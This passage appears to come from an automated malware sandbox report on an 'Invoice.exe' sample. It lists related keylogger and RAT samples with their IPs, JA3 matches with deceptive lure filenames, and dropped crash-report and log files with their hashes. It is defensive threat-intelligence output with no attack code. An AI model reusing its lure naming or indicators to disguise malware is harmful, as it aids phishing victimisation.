	fw5476UX6g.exe	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse	132.226.247.73
	TpHHp3vAuM.exe	Get hash	malicious	CryptOne, Snake Keylogger	Browse	132.226.247.73
	7uUGimQipu.exe	Get hash	malicious	GuLoader, Snake Keylogger	Browse	132.226.8.169
	oR7Y7ZxJLU.exe	Get hash	malicious	MSIL Logger, MassLogger RAT	Browse	132.226.247.73

JA3 Fingerprints

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
54328bd36c14bd82ddaa0c04b25ed9ad	kissingwithbestexperiencedgirlfriendonhereformenice.hta	Get hash	malicious	Cobalt Strike, MSIL Logger, MassLogger RAT	Browse	104.21.16.1
	PO202503S.xlsm	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse	104.21.16.1
	niceworkingskillwithbestideasevermade.hta	Get hash	malicious	Cobalt Strike, MSIL Logger, MassLogger RAT	Browse	104.21.16.1
	QUOTATION_FEBQUOTE312025PDF.scr.exe	Get hash	malicious	MSIL Logger	Browse	104.21.16.1
	New Order RFQ- 19A20060.exe	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse	104.21.16.1
	EM#U0130R_7880330875661236965345096345789_3479653.exe	Get hash	malicious	MSIL Logger, MassLogger RAT	Browse	104.21.16.1
	INQ_NO_097590_0109_Order.cmd	Get hash	malicious	DBatLoader, MSIL Logger, MassLogger RAT, PureLog Stealer	Browse	104.21.16.1
	SIP_20252701095738583757327401213.bat.exe	Get hash	malicious	MSIL Logger, MassLogger RAT	Browse	104.21.16.1
	ja811MqV4h.exe	Get hash	malicious	DBatLoader, MSIL Logger, MassLogger RAT, PureLog Stealer	Browse	104.21.16.1
	SHIPPING ADVICE#2025.exe	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse	104.21.16.1

Dropped Files

⊘No context

Created / dropped Files

C:\ProgramData\Microsoft\Windows\WER\ReportQueue\AppCrash_HbxYXheklrhvR.ex_74b9deadb0e6e0326d2fe59a3212e3909bf095a0_bdce14ac_a1c55d20-980c-435f-aedf-a92fe8b2b342\Report.wer

Download File

Process:	C:\Windows\SysWOW64\WerFault.exe
File Type:	Unicode text, UTF-16, little-endian text, with CRLF line terminators
Category:	dropped
Size (bytes):	65536
Entropy (8bit):	1.1256166539145038
Encrypted:	false
SSDEEP:	192:UJ34/NuJexs0BU/qaG3F77SZrpzuiFOZ24IO8EO:yWNGeBBU/qaUyzuiFOY4IO8EO
MD5:	C9C0E6EB33CC191C0CB98E4873CE40FB
SHA1:	7179CDE886D4E8FF0F592C797386DD209D4D8DE6
SHA-256:	4588AFC3CEB5F91573329A9170E01800E294063DE5CFFE5DB6A46C34BEAB6D13
SHA-512:	78308C084B06ADFDF3EE1D0186B5D7E7C5265C17BDEF8521B9DACF8E02C0CA9161E4E3B2B3278BFA0F7D632F1482B9297D5020D8633039A9E57AC83FB64615A2
Malicious:	false
Preview:	..V.e.r.s.i.o.n.=.1.....E.v.e.n.t.T.y.p.e.=.C.L.R.2.0.r.3.....E.v.e.n.t.T.i.m.e.=.1.3.3.8.6.1.5.7.1.7.8.7.6.8.8.4.4.1.....R.e.p.o.r.t.T.y.p.e.=.2.....C.o.n.s.e.n.t.=.1.....U.p.l.o.a.d.T.i.m.e.=.1.3.3.8.6.1.5.7.1.7.9.4.5.6.3.3.7.9.....R.e.p.o.r.t.S.t.a.t.u.s.=.5.2.4.3.8.4.....R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.a.1.c.5.5.d.2.0.-.9.8.0.c.-.4.3.5.f.-.a.e.d.f.-.a.9.2.f.e.8.b.2.b.3.4.2.....I.n.t.e.g.r.a.t.o.r.R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.3.2.d.5.5.e.b.3.-.f.f.8.5.-.4.f.0.2.-.8.7.7.9.-.8.4.0.f.e.a.5.e.4.3.c.e.....W.o.w.6.4.H.o.s.t.=.3.4.4.0.4.....W.o.w.6.4.G.u.e.s.t.=.3.3.2.....N.s.A.p.p.N.a.m.e.=.H.b.x.Y.X.h.e.k.l.r.h.v.R...e.x.e.....O.r.i.g.i.n.a.l.F.i.l.e.n.a.m.e.=.A.o.f.I...e.x.e.....A.p.p.S.e.s.s.i.o.n.G.u.i.d.=.0.0.0.0.1.d.a.4.-.0.0.0.1.-.0.0.1.8.-.6.b.e.5.-.5.2.e.7.6.3.9.2.d.b.0.1.....T.a.r.g.e.t.A.p.p.I.d.=.W.:.0.0.0.6.4.d.6.e.1.c.6.5.a.e.1.9.d.8.0.c.0.b.3.3.3.b.a.f.4.a.0.5.b.1.d.c.0.0.0.0.0.0.0.0.!.0.0.0.0.d.3.b.1.6.8.4.4.6.6.4.5.9.3.4.f.9.1.5.b.1.f.7.6.8.9.d.1.1.8.7.e.9.3.2.2.2.

C:\ProgramData\Microsoft\Windows\WER\ReportQueue\AppCrash_Invoice.exe_4eea8f7635debfc89bf231883ea8031a3f4438f_ba95ec82_b2c7c00f-4dd9-4fb8-b240-80c0677674fb\Report.wer

Download File

Process:	C:\Windows\SysWOW64\WerFault.exe
File Type:	Unicode text, UTF-16, little-endian text, with CRLF line terminators
Category:	dropped
Size (bytes):	65536
Entropy (8bit):	1.2405033277664594
Encrypted:	false
SSDEEP:	384:OLLhJNnFLxBU/CNbaUlcmzuiFOY4IO8EKj:cLhJLxBU/CNbaU3zuiFOY4IO8z
MD5:	D919FF7AB1D15354EB42CFD154F56D77
SHA1:	3D8D1175A108B8C1FF48B03E9E99FA947263B754
SHA-256:	382D3D1AD8FF4AFCBD002FFAB1C7D9E368E2503727794957833F7AB6C9B2F2EB
SHA-512:	A7810F461749EC46AB3E68E6E983DDF66DDEC21AED7220B1FAF54D7D954E5151DE90DBC67E458BA029EEED8E303145BF04E2C842F7E990837C0727B824DD0B01
Malicious:	true
Preview:	..V.e.r.s.i.o.n.=.1.....E.v.e.n.t.T.y.p.e.=.C.L.R.2.0.r.3.....E.v.e.n.t.T.i.m.e.=.1.3.3.8.6.1.5.7.1.7.0.9.6.1.9.4.9.3.....R.e.p.o.r.t.T.y.p.e.=.2.....C.o.n.s.e.n.t.=.1.....U.p.l.o.a.d.T.i.m.e.=.1.3.3.8.6.1.5.7.1.7.2.5.8.6.9.5.2.8.....R.e.p.o.r.t.S.t.a.t.u.s.=.5.2.4.3.8.4.....R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.b.2.c.7.c.0.0.f.-.4.d.d.9.-.4.f.b.8.-.b.2.4.0.-.8.0.c.0.6.7.7.6.7.4.f.b.....I.n.t.e.g.r.a.t.o.r.R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.4.5.9.b.f.2.2.0.-.3.7.8.f.-.4.d.9.5.-.b.a.1.b.-.1.0.b.d.8.7.7.c.5.8.7.d.....W.o.w.6.4.H.o.s.t.=.3.4.4.0.4.....W.o.w.6.4.G.u.e.s.t.=.3.3.2.....N.s.A.p.p.N.a.m.e.=.I.n.v.o.i.c.e...e.x.e.....O.r.i.g.i.n.a.l.F.i.l.e.n.a.m.e.=.A.o.f.I...e.x.e.....A.p.p.S.e.s.s.i.o.n.G.u.i.d.=.0.0.0.0.1.b.7.4.-.0.0.0.1.-.0.0.1.8.-.6.5.d.7.-.e.2.e.2.6.3.9.2.d.b.0.1.....T.a.r.g.e.t.A.p.p.I.d.=.W.:.0.0.0.6.4.d.6.e.1.c.6.5.a.e.1.9.d.8.0.c.0.b.3.3.3.b.a.f.4.a.0.5.b.1.d.c.0.0.0.0.0.0.0.0.!.0.0.0.0.d.3.b.1.6.8.4.4.6.6.4.5.9.3.4.f.9.1.5.b.1.f.7.6.8.9.d.1.1.8.7.e.9.3.2.2.2.d.9.6.!.I.n.

C:\ProgramData\Microsoft\Windows\WER\Temp\WER5BC8.tmp.dmp

Download File

Process:	C:\Windows\SysWOW64\WerFault.exe
File Type:	Mini DuMP crash report, 15 streams, Tue Mar 11 08:59:31 2025, 0x1205a4 type
Category:	dropped
Size (bytes):	373636
Entropy (8bit):	3.9851496450772155
Encrypted:	false
SSDEEP:	3072:DDMFCJmyZfEVnDlbW0UtupjZf8EGtCZRhT4uEqXSLTgdzVLgC:DDMFCJmyhADl6Ir8EGtCnhT4+ATgH
MD5:	3BE83A7E157F8EA45D0BDE9B7FC31131
SHA1:	9520936909C240C9C6FA41E10CD3155736C2F153
SHA-256:	4A413EE307CD8156934C74795899FF463A60B7343B46106B956ED87531283F43
SHA-512:	EF0FC2E4C1504076A3F5B55186259187EE7D43867261D15486408EFEB5CBFC6551B6CB871B6A904FF35412DC7FC2FE78ED9E702F4E0232DB7D41987EDA0927CA
Malicious:	false
Preview:	MDMP..a..... .......s..g............4...........0"..H.......$...x,...........k..........`.......8...........T............G...k...........,..........................................................................................eJ...... /......GenuineIntel............T.......t...l..g.............................0..............,...E.a.s.t.e.r.n. .S.t.a.n.d.a.r.d. .T.i.m.e...........................................E.a.s.t.e.r.n. .S.u.m.m.e.r. .T.i.m.e...............................................1.9.0.4.1...1...a.m.d.6.4.f.r.e...v.b._.r.e.l.e.a.s.e...1.9.1.2.0.6.-.1.4.0.6.......................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\ProgramData\Microsoft\Windows\WER\Temp\WER5EF5.tmp.WERInternalMetadata.xml

Download File

Process:	C:\Windows\SysWOW64\WerFault.exe
File Type:	XML 1.0 document, Unicode text, UTF-16, little-endian text, with CRLF line terminators
Category:	dropped
Size (bytes):	8406
Entropy (8bit):	3.694851073066944
Encrypted:	false
SSDEEP:	192:R6l7wVeJaAU6zGK6Y6CSU9W9gmfZ2tUprt89bC/sfn2m:R6lXJaD6f6YfSU9W9gmf4tzCkf/
MD5:	3B946B12DBB489E7BA0B765EAAB6C9DD
SHA1:	548138C0378B1169965EF027419EFFCF66C7C4A8
SHA-256:	4EFF246496D01E2AE785BAC77790791FD8058D6852BD4994AE9A327FEB965688
SHA-512:	1A8E4E591171F3CA236728348185492FFDDB027CBE6306856180C8007514CB46851E88001E57D659379CD2C03693D5B3B029CD88A48FC1C1F60A2B82F091EE41
Malicious:	false
Preview:	..<.?.x.m.l. .v.e.r.s.i.o.n.=.".1...0.". .e.n.c.o.d.i.n.g.=.".U.T.F.-.1.6.".?.>.....<.W.E.R.R.e.p.o.r.t.M.e.t.a.d.a.t.a.>.......<.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.........<.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.1.0...0.<./.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.........<.B.u.i.l.d.>.1.9.0.4.5.<./.B.u.i.l.d.>.........<.P.r.o.d.u.c.t.>.(.0.x.3.0.).:. .W.i.n.d.o.w.s. .1.0. .P.r.o.<./.P.r.o.d.u.c.t.>.........<.E.d.i.t.i.o.n.>.P.r.o.f.e.s.s.i.o.n.a.l.<./.E.d.i.t.i.o.n.>.........<.B.u.i.l.d.S.t.r.i.n.g.>.1.9.0.4.1...2.0.0.6...a.m.d.6.4.f.r.e...v.b._.r.e.l.e.a.s.e...1.9.1.2.0.6.-.1.4.0.6.<./.B.u.i.l.d.S.t.r.i.n.g.>.........<.R.e.v.i.s.i.o.n.>.2.0.0.6.<./.R.e.v.i.s.i.o.n.>.........<.F.l.a.v.o.r.>.M.u.l.t.i.p.r.o.c.e.s.s.o.r. .F.r.e.e.<./.F.l.a.v.o.r.>.........<.A.r.c.h.i.t.e.c.t.u.r.e.>.X.6.4.<./.A.r.c.h.i.t.e.c.t.u.r.e.>.........<.L.C.I.D.>.2.0.5.7.<./.L.C.I.D.>.......<./.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.......<.P.r.o.c.e.s.s.I.n.f.o.r.m.a.t.i.o.n.>.........<.P.i.d.>.7.0.2.8.<./.P.i.

C:\ProgramData\Microsoft\Windows\WER\Temp\WER5F54.tmp.xml

Download File

Process:	C:\Windows\SysWOW64\WerFault.exe
File Type:	XML 1.0 document, ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	4739
Entropy (8bit):	4.459444304286139
Encrypted:	false
SSDEEP:	48:cvIwWl8zsENJg77aI9tkprWpW8VYQoYm8M4JJm9FTDJ+q8vgmeHN76d:uIjfEnI7Upa7VXFJmJKyN76d
MD5:	423C8234FC8968571D81774A423E2D8A
SHA1:	6FDB185A822E817BE912C308295D1A4A8D580596
SHA-256:	A59B25D5CFF56E63CA1987CFA57C398841947F6FB53910FA0B9B124F35D3CBF6
SHA-512:	DA5F463BF3FCE4E50C105C8B3CD0B67D7C85FBB7A6A208582D81699D7C841A57085B9F3DEF58A131F1B45FED6F1B34B40F4FD41166629FDE7C895974AEFD403F
Malicious:	false
Preview:	<?xml version="1.0" encoding="UTF-8" standalone="yes"?>..<req ver="2">.. <tlm>.. <src>.. <desc>.. <mach>.. <os>.. <arg nm="vermaj" val="10" />.. <arg nm="vermin" val="0" />.. <arg nm="verbld" val="19045" />.. <arg nm="vercsdbld" val="2006" />.. <arg nm="verqfe" val="2006" />.. <arg nm="csdbld" val="2006" />.. <arg nm="versp" val="0" />.. <arg nm="arch" val="9" />.. <arg nm="lcid" val="2057" />.. <arg nm="geoid" val="223" />.. <arg nm="sku" val="48" />.. <arg nm="domain" val="0" />.. <arg nm="prodsuite" val="256" />.. <arg nm="ntprodtype" val="1" />.. <arg nm="platid" val="2" />.. <arg nm="tmsi" val="756002" />.. <arg nm="osinsty" val="1" />.. <arg nm="iever" val="11.789.19041.0-11.0.1000" />.. <arg nm="portos" val="0" />.. <arg nm="ram" val="409

C:\ProgramData\Microsoft\Windows\WER\Temp\WER7A2D.tmp.dmp

Download File

Process:	C:\Windows\SysWOW64\WerFault.exe
File Type:	Mini DuMP crash report, 15 streams, Tue Mar 11 08:59:39 2025, 0x1205a4 type
Category:	dropped
Size (bytes):	319385
Entropy (8bit):	4.1944207917008125
Encrypted:	false
SSDEEP:	3072:fffyt7Tg9gDS0/PZd7YvZf8EGtCZRcz4uEqxLTgO:fHytQ9kSF8EGtCncz4iTg
MD5:	EF811BAD90ECE8E21515FC0E61A7D130
SHA1:	4B9535C86EB55DE3222518426ADEF54F52DFAB2A
SHA-256:	DBACF89829F1807460A4A4125B1994E4C55DC1832430121ED7334C3C0C28090B
SHA-512:	A98EF5516F704FA79956C2A71BC549A0E00F523F73F7373DA762A5CB4342061517D04ED145CB9B2D77C80CF171CEA31ADB374790E188A279808D1DC0CD841D1E
Malicious:	false
Preview:	MDMP..a..... .......{..g............D...........,...X.......<....#.......)...R..........`.......8...........T...........P3..I............#...........%..............................................................................eJ......D&......GenuineIntel............T...........s..g............................. ..............,...E.a.s.t.e.r.n. .S.t.a.n.d.a.r.d. .T.i.m.e...........................................E.a.s.t.e.r.n. .S.u.m.m.e.r. .T.i.m.e...............................................1.9.0.4.1...1...a.m.d.6.4.f.r.e...v.b._.r.e.l.e.a.s.e...1.9.1.2.0.6.-.1.4.0.6.......................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\ProgramData\Microsoft\Windows\WER\Temp\WER7B57.tmp.WERInternalMetadata.xml

Download File

Process:	C:\Windows\SysWOW64\WerFault.exe
File Type:	XML 1.0 document, Unicode text, UTF-16, little-endian text, with CRLF line terminators
Category:	dropped
Size (bytes):	6408
Entropy (8bit):	3.725044488716016
Encrypted:	false
SSDEEP:	96:RSIU6o7wVetbkHS63lPnYZQQE/6Sc5aM4UWUf89b6w0Bsf07em:R6l7wVeJES6VPnYZQUprj89b6dsf07em
MD5:	2F8781B63769DC59F1D08B5A90ACDA5A
SHA1:	A75D846511F20BB0ABABA1C1CD62FA3E856F998E
SHA-256:	7047A125A74664F4BCC9C075A6DE9ADD0FF5C715CC0D0671730131E272B4B71A
SHA-512:	5A455F0E68FA03313BA419AE7C07EF54C33F81EF73F440B5C76FE9165DE2B7DB2416E643BE61728F3BB596317261F0ADC5401E9F13EDDBA3B01D0467AF75E322
Malicious:	false
Preview:	..<.?.x.m.l. .v.e.r.s.i.o.n.=.".1...0.". .e.n.c.o.d.i.n.g.=.".U.T.F.-.1.6.".?.>.....<.W.E.R.R.e.p.o.r.t.M.e.t.a.d.a.t.a.>.......<.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.........<.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.1.0...0.<./.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.........<.B.u.i.l.d.>.1.9.0.4.5.<./.B.u.i.l.d.>.........<.P.r.o.d.u.c.t.>.(.0.x.3.0.).:. .W.i.n.d.o.w.s. .1.0. .P.r.o.<./.P.r.o.d.u.c.t.>.........<.E.d.i.t.i.o.n.>.P.r.o.f.e.s.s.i.o.n.a.l.<./.E.d.i.t.i.o.n.>.........<.B.u.i.l.d.S.t.r.i.n.g.>.1.9.0.4.1...2.0.0.6...a.m.d.6.4.f.r.e...v.b._.r.e.l.e.a.s.e...1.9.1.2.0.6.-.1.4.0.6.<./.B.u.i.l.d.S.t.r.i.n.g.>.........<.R.e.v.i.s.i.o.n.>.2.0.0.6.<./.R.e.v.i.s.i.o.n.>.........<.F.l.a.v.o.r.>.M.u.l.t.i.p.r.o.c.e.s.s.o.r. .F.r.e.e.<./.F.l.a.v.o.r.>.........<.A.r.c.h.i.t.e.c.t.u.r.e.>.X.6.4.<./.A.r.c.h.i.t.e.c.t.u.r.e.>.........<.L.C.I.D.>.2.0.5.7.<./.L.C.I.D.>.......<./.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.......<.P.r.o.c.e.s.s.I.n.f.o.r.m.a.t.i.o.n.>.........<.P.i.d.>.7.5.8.8.<./.P.i.

C:\ProgramData\Microsoft\Windows\WER\Temp\WER7C23.tmp.xml

Download File

Process:	C:\Windows\SysWOW64\WerFault.exe
File Type:	XML 1.0 document, ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	4769
Entropy (8bit):	4.494827229315653
Encrypted:	false
SSDEEP:	48:cvIwWl8zsENJg77aI9tkprWpW8VYuYm8M4Jxm9Ff+q8vqmrr1fd:uIjfEnI7Upa7V2JWK9r1fd
MD5:	0748B531FDE5247F0A8C28DA793A5582
SHA1:	ABF57879FF6C2A601A4F3AE181A4791321A01804
SHA-256:	153F340313CA7FD9C13D43F6725BA6F443B44A7A1E4F98C9BA7DFF30C683D39A
SHA-512:	AE9F54343ECEBE21D221949FF729CCCD790F1E7EF376BD15DFCAABD8F37732D5DFE0F5827E900B2E08424ECFD2DFAC6148183BF00DCE60F6968D6417D29CD45C
Malicious:	false
Preview:	<?xml version="1.0" encoding="UTF-8" standalone="yes"?>..<req ver="2">.. <tlm>.. <src>.. <desc>.. <mach>.. <os>.. <arg nm="vermaj" val="10" />.. <arg nm="vermin" val="0" />.. <arg nm="verbld" val="19045" />.. <arg nm="vercsdbld" val="2006" />.. <arg nm="verqfe" val="2006" />.. <arg nm="csdbld" val="2006" />.. <arg nm="versp" val="0" />.. <arg nm="arch" val="9" />.. <arg nm="lcid" val="2057" />.. <arg nm="geoid" val="223" />.. <arg nm="sku" val="48" />.. <arg nm="domain" val="0" />.. <arg nm="prodsuite" val="256" />.. <arg nm="ntprodtype" val="1" />.. <arg nm="platid" val="2" />.. <arg nm="tmsi" val="756002" />.. <arg nm="osinsty" val="1" />.. <arg nm="iever" val="11.789.19041.0-11.0.1000" />.. <arg nm="portos" val="0" />.. <arg nm="ram" val="409

C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\HbxYXheklrhvR.exe.log

Download File

Process:	C:\Users\user\AppData\Roaming\HbxYXheklrhvR.exe
File Type:	ASCII text, with CRLF line terminators
Category:	modified
Size (bytes):	1216
Entropy (8bit):	5.34331486778365
Encrypted:	false
SSDEEP:	24:MLUE4K5E4KH1qE4qXKDE4KhKiKhPKIE4oKNzKoZAE4Kze0E4x84j:MIHK5HKH1qHiYHKh3oPtHo6hAHKze0HJ
MD5:	1330C80CAAC9A0FB172F202485E9B1E8
SHA1:	86BAFDA4E4AE68C7C3012714A33D85D2B6E1A492
SHA-256:	B6C63ECE799A8F7E497C2A158B1FFC2F5CB4F745A2F8E585F794572B7CF03560
SHA-512:	75A17AB129FE97BBAB36AA2BD66D59F41DB5AFF44A705EF3E4D094EC5FCD056A3ED59992A0AC96C9D0D40E490F8596B07DCA9B60E606B67223867B061D9D0EB2
Malicious:	false
Preview:	1,"fusion","GAC",0..1,"WinRT","NotApp",1..2,"System.Windows.Forms, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089",0..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System\920e3d1d70447c3c10e69e6df0766568\System.ni.dll",0..2,"System.Drawing, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Core\8b2c1203fd20aea8260bfbc518004720\System.Core.ni.dll",0..3,"System.Configuration, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Configuration\2192b0d5aa4aa14486ae08118d3b9fcc\System.Configuration.ni.dll",0..3,"System.Xml, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Xml\2062ed810929ec0e33254c02

C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\Invoice.exe.log

Download File

Process:	C:\Users\user\Desktop\Invoice.exe
File Type:	ASCII text, with CRLF line terminators
Category:	modified
Size (bytes):	1216
Entropy (8bit):	5.34331486778365
Encrypted:	false
SSDEEP:	24:MLUE4K5E4KH1qE4qXKDE4KhKiKhPKIE4oKNzKoZAE4Kze0E4x84j:MIHK5HKH1qHiYHKh3oPtHo6hAHKze0HJ
MD5:	1330C80CAAC9A0FB172F202485E9B1E8
SHA1:	86BAFDA4E4AE68C7C3012714A33D85D2B6E1A492
SHA-256:	B6C63ECE799A8F7E497C2A158B1FFC2F5CB4F745A2F8E585F794572B7CF03560
SHA-512:	75A17AB129FE97BBAB36AA2BD66D59F41DB5AFF44A705EF3E4D094EC5FCD056A3ED59992A0AC96C9D0D40E490F8596B07DCA9B60E606B67223867B061D9D0EB2
Malicious:	true
Preview:	1,"fusion","GAC",0..1,"WinRT","NotApp",1..2,"System.Windows.Forms, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089",0..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System\920e3d1d70447c3c10e69e6df0766568\System.ni.dll",0..2,"System.Drawing, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Core\8b2c1203fd20aea8260bfbc518004720\System.Core.ni.dll",0..3,"System.Configuration, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Configuration\2192b0d5aa4aa14486ae08118d3b9fcc\System.Configuration.ni.dll",0..3,"System.Xml, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Xml\2062ed810929ec0e33254c02

C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\RegSvcs.exe.log

Download File

Process:	C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
File Type:	ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	1039
Entropy (8bit):	5.353332853270839
Encrypted:	false
SSDEEP:	24:ML9E4KiE4Ko84qXKDE4KhKiKhPKIE4oKNzKoZAE4KzeR:MxHKiHKoviYHKh3oPtHo6hAHKzeR
MD5:	A4AF0F36EC4E0C69DC0F860C891E8BBE
SHA1:	28DD81A1EDDF71CBCBF86DA986E047279EF097CD
SHA-256:	B038D4342E4DD96217BD90CFE32581FCCB381C5C2E6FF257CD32854F840D1FDE
SHA-512:	A675D3E9DB5BDD325A22E82C6BCDBD5409D7A34453DAAEB0E37206BE982C388547E1BDF22DC70393C69D0CE55635E2364502572C3AD2E6753A56A5C3893F6D69
Malicious:	false
Preview:	1,"fusion","GAC",0..1,"WinRT","NotApp",1..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System\920e3d1d70447c3c10e69e6df0766568\System.ni.dll",0..2,"System.Windows.Forms, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089",0..2,"Microsoft.VisualBasic, Version=10.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Core\8b2c1203fd20aea8260bfbc518004720\System.Core.ni.dll",0..3,"System.Configuration, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Configuration\2192b0d5aa4aa14486ae08118d3b9fcc\System.Configuration.ni.dll",0..3,"System.Xml, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Xml\2062ed810929ec0e

C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Download File

Process:	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
File Type:	data
Category:	dropped
Size (bytes):	2232
Entropy (8bit):	5.380805901110357
Encrypted:	false
SSDEEP:	48:lylWSU4y4RQmFoUeWmfgZ9tK8NPZHUm7u1iMuge//YUyus:lGLHyIFKL3IZ2KRH9Oug8s
MD5:	15DF1506860EF01EE206E90F990D0793
SHA1:	87B49532502A829CEB4C2860F263BFD399FF0C3A
SHA-256:	E784E1D05093C8B83297C7F77A0D25A21A8FB767801FDEAAA42CCC3166800465
SHA-512:	EF88064F4612332CC8405FB0405CD2B70A6DD9D93366651E405421EE9A0BB8B5409652B407D64A3343D142F9D62B6035608F93855C133D489FFA102A844C75CF
Malicious:	false
Preview:	@...e.................................^..............@..........P................1]...E.....j.....(.Microsoft.PowerShell.Commands.ManagementH...............o..b~.D.poM......... .Microsoft.PowerShell.ConsoleHost0......................C.l]..7.s........System..4....................D...{..\|f........System.Core.D...............4..7..D.#V.............System.Management.AutomationL.................gQ?O.....x5.......#.Microsoft.Management.Infrastructure.<................t.,.lG....M...........System.Management...@................z.U..G...5.f.1........System.DirectoryServices4.................%...K... ...........System.Xml..8..................1...L..U;V.<}........System.Numerics.4.....................@.[8]'.\........System.Data.<...............i..VdqF...\|...........System.ConfigurationH................WY..2.M.&..g(g........Microsoft.PowerShell.Security...<...............V.}...@...i...........System.Transactions.P...............8..{...@.e..."4.......%.Microsoft.PowerShell.Com

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_4qdi0hay.smj.ps1

Download File

Process:	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_c1eaekzn.fhu.ps1

Download File

Process:	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_c2q33xoc.o3h.psm1

Download File

Process:	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
